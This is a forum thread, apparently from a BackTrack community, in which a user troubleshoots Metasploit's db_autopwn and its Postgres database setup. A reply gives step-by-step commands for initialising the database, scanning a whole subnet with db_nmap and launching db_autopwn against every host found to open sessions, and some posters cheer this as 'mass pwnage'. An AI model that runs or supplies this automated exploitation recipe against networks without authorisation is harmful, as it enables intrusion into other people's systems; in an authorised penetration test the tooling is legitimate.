Also if i ignore those results and keep going, every command I type results in the first quoted outcome I posted above.
need help with db_autopwn
When I am running the scripts before autopwn, after I run db_hosts, I get this
msf exploit(ms06_040_netapi) > db_hosts
[-] Error while running command db_hosts: could not connect to server: No such file or directory
Is the server running locally and accepting
connections on Unix domain socket "/tmp/.s.PGSQL.5432"?
Call stack:
/usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/connection_adapters/postgresql_adapter.rb:24:in `connect'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/connection_adapters/postgresql_adapter.rb:24:in `postgresql_connection'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/connection_adapters/abstract/connection_specification.rb:262:in `connection_without_query_cache='
/usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/query_cache.rb:54:in `connection='
/usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/connection_adapters/abstract/connection_specification.rb:230:in `retrieve_connection'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/connection_adapters/abstract/connection_specification.rb:78:in `connection'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/base.rb:1140:in `add_limit!'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/base.rb:1102:in `construct_finder_sql'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/base.rb:997:in `find_every'
/usr/lib/ruby/gems/1.8/gems/activerecord-1.15.2/lib/active_record/base.rb:418:in `find'
/pentest/exploits/framework3/lib/msf/core/db_objects.rb:35:in `find'
/usr/lib/ruby/1.8/thread.rb:135:in `synchronize'
/pentest/exploits/framework3/lib/msf/core/db_objects.rb:34:in `find'
/pentest/exploits/framework3/lib/msf/core/db.rb:160:in `hosts'
/pentest/exploits/framework3/lib/msf/core/db.rb:151:in `each_host'
/pentest/exploits/framework3/lib/msf/ui/console/command_dispatcher/db.rb:45:in `cmd_db_hosts'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:230:in `run_command'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single'
/pentest/exploits/framework3/lib/rex/ui/text/shell.rb:125:in `run'
/pentest/exploits/framework3/msfconsole:77
msf exploit(ms06_040_netapi) >
and I think it might have something to do with the db_create because after I run that, I get this
However it still says it created the databasemsf exploit(ms06_040_netapi) > db_create tester
createdb: could not connect to database postgres: could not connect to server: No such file or directory
Is the server running locally and accepting
connections on Unix domain socket "/tmp/.s.PGSQL.5432"?
psql: could not connect to server: No such file or directory
Is the server running locally and accepting
connections on Unix domain socket "/tmp/.s.PGSQL.5432"?[*] Database creation complete (check for errors)
I followed a video seen here
http://milw0rm.com/video/watch.php?id=50
and I do exactly what's shown in the video.
Does someone know what I'm doing wrong? I've tried following tutorials but I get the same results and I have no idea what keywords I'd use to search for.
Any help is appreciated and if there is a keyword I can search for let me know!
Also if i ignore those results and keep going, every command I type results in the first quoted outcome I posted above.
I think its a great thing that some of these tutorial videos dont show the correct and/or complete process because it stops people like you simply following the steps for mass pwnage without understand what the hell is going on.
Please read hdm's blog entry on autopwn:
blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html
And if you still have problems after that, post back here and I will be more than happy to help
I've done everything in that tutorial and I still get the same results. One thing I did notice was when typing initdb ~/metasploitdb I get this
initdb ~/metasploitdb
initdb: cannot be run as root
Please log in (using, e.g., "su") as the (unprivileged) user that will
own the server process.
Everything before that point in the tutorial I did correctly and did the checks to make sure everythign was alright. I also updated everything so it's all up to date.
ok, ur getting warmer.
you need to su - postgres before you initdb ~/metasploit3
That video you have is shit, it doesnt cover setting up postgres before you autopwn
Theres a much better video made my muts
Steps to autopwnage in bt2:
Step1:
#su - postgres
(Ignore the error message)
Step 2:
#initdb ~/metasploit3
Step 3:
#pg_ctl ~/metasploit3 start
Step 4:
#cd /pentest/exploits/framework3
#./msfconsole
Step 5:
msf > load db_postgres
msf > db_create
msf > db_hosts
(No output? Good)
Step 6: Nmap Scan from msf
msf > db_nmap -p 137,139,445 192.168.0.0/24
Step 7: Check the hosts table now, you should have the positive nmap results
msf > db_hosts
Step 8: Run autopwn against the ports from your nmap results
msf > db_autopwn -p -t -e
(Pwnage in action)
msf > sessions -l
Voila
Muts did a great video on autopwn in action a while back. I dont know where it is though....
Maybe you should learn WTF your doing with metasploit before you go off on a half cocked automated exploit binge
Thanks a bunch! I wouldn't have known what to do with su since I haven't used that feature before in linux (never had to before backtrack)Originally Posted by SaintN
i got it working (sorta). it's been running for a while, and it's been stuck on this for about 5 minutes
[*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.1.101[\lsarpc] ...
and the white cursor is just sitting below that so is it actually still doing stuff, or did it just die? I thought the numbers and letters were weird, being in order and whatnot
ok, thats made my day.
No more help for you
I meant I thought you just had to enter su, and that's what i've been doing before you helped me out.ok, thats made my day.
No more help for you
But any reason why it would freeze after it bound to the computer? it doesnt do it all the time though
Posting Permissions